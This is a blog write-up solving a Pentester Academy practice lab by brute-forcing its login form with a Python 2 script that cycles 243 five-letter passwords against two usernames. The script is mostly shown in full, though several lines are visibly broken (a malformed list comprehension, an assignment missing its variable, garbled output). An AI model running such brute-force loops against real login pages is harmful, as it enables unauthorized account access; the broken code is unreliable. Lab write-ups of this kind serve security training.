الثلاثاء، 29 أكتوبر 2013

securitytube (pentester academy) Challenge 1 Solution

 Hello Guys, 

I'm gonna show u how I could solve the challenge 1 of securitytube challenges by writing a simple python script . 

Firstly Let's have a look on the challenge (url Below) : 


ok it gives us some hints : 



Hint:
  1. Company Domain: PentesterAcademy.com
  2. Usernames: jack, admin
  3. Password Complexity: 5 characters and uses only x,y,z lowercase. Password examples - xxyyz, xyzxy, xyxxx etc.
ok as shown in hints it gives us  a combination of passwords and 2 usernames it seems to be brute force attack on a form :) 

so with a simple calculation the password would be a combination of three letters only (x , y and z ) with a length of 5 characters , so number of probabilities would be ( 3 ^ 5 ) = 243 probability and we have 2 usernames , so number of tries will be done on this form is (243 * 2  = 486)  try .

ok let's start coding our script to brute force on this form : 

I'm gonna use (urllib2) to connect to a web page -> 

    

  1. 
#!/usr/bin/env python
    

    2. 

  2. 

    

    3. 

  3. 
import urllib2
    

    4. 

  4. 
response = urllib2.urlopen('http://pentesteracademylab.appspot.com//lab/webapp/auth/1/login')
    

    5. 

  5. 
print response.info()
    

    6. 

  6. 

    

    7. 

  7. 
# do something
    

    8. 

  8. 
response.close()
    

    9.
this code will give us and output 
    

  1. 

    
Content-Type: text/html; charset=utf-8
    
Cache-Control: no-cache

    

    
te: Wed, 16 Oct 2013 
    

Vary: Accept-Encoding
D
a14:59:24 GMT
Server: Google Frontend

    

    
: close

    

Alternate-Protocol: 80:quic
Connectio
    
n
    

    

    2. 

  2. 


    

    3.
it's the header info , so connection successfully done .

Now we need to generate 243 probability of password

  1. your_list = 'xyz'
  2. complete_list = []
  3. for current in xrange(5):
  4.     a = [for i in your_list]
  5.     for y in xrange(current):
  6.         a = [x+i for i in your_list for x in a]
  7.     complete_list = complete_list+a

this code will generate combination from length (1 to 5 ) so we need to split it and extract only combination for 5 chars length .

  1. chunk = complete_list[120:363]
  2. print chunk
  3. print len(chunk)
 the output for chunck will be (243) . Cool :)

now let's make a list for users

  1. username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']

ok now we created a list for password and usernames . we need to make connection for the vulnerable app and try to connect with generated passwords and usernames .

We need to make a for loop for passwords
  1. for pw in chunk:

and we'll make another for loop for usernames under the first loop
  1.         for x in username:

then we'll print every single try for username and password
  1.                 trying =  "Trying with Username \t"+ x +"\t password "+pw + "\n"

and as we know that the url for vulnerable app is
  1. ('http://pentesteracademylab.appspot.com/lab/webapp/1?email=username&password=password)
so we will replace username parameter with x variable and password with pw variable

  1.                 url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)

that's good , our script now will send requests to the form and try with generated username and password but we didn't get the response yet ! . we need to know if the username and password is right or incorrect . so we'll put in these lines of codes
  1.                 request = urllib2.Request(url)
  2.                 response = urllib2.urlopen(request)
  3.                 back = response.read()[2486:2492]

Attention :  for the line 
  1.                 back = response.read()[2486:2492]
when u get the  response you need to specify the line which tells you if the password is right or incorrect

if you tried to put


  1.                 back = response.read()


         print back


the output will be the whole page :



So , we need to split it from the char 2486 to 2492 and it's the word "failed" . 
we'll check if every output from the page is failed or not

  1.                 print back
                    if(back!="Failed"):
  2.                         cprint  ("Success With Username " +x+ "& Password " + pw ,'red')

and successfully the challenge solved ! :D

here's the whole code

  1. #!/usr/bin/env  python
  2. '''
  3. Brute Force On Challenge 1
  4. Ahmed Sherif
  6. '''
  7. import urllib2
  8. import os
  9. from termcolor  import cprint,colored
  10. your_list = 'xyz'
  11. complete_list = []
  12. for current in xrange(5):
  13.     a = [for i in your_list]
  14.     for y in xrange(current):
  15.         a = [x+i for i in your_list for x in a]
  16.     complete_list = complete_list+a
  18. chunk = complete_list[120:363]
  19. print chunk
  20. print len(chunk)
  21. = open('myfile3.txt', 'w')
  24. username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']
  28. for pw in chunk:
  29.         for x in username:
  30.        
  31.                 trying =  "Trying with Username \t"+ x +"\t password "+pw + "\n"
  32.                 print   trying
  33.                 url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)
  34.                 request = urllib2.Request(url)
  35.                 response = urllib2.urlopen(request)
  36.                 back = response.read()[2486:2492]
  37.                 print back
  38.                 f.write(trying + back + "\n")
  39.                 if(back!="Failed"):
  40.                         cprint  ("Success With Username " +x+ "& Password " + pw ,'red')
  41.                        
  43. f.close()
or you can download it from here 
http://pastebin.com/HZDaBgQs




مرسلة بواسطة في

0 التعليقات:

إرسال تعليق

شكرا لاضافة تعليق

الاشتراك في: تعليقات الرسالة (Atom)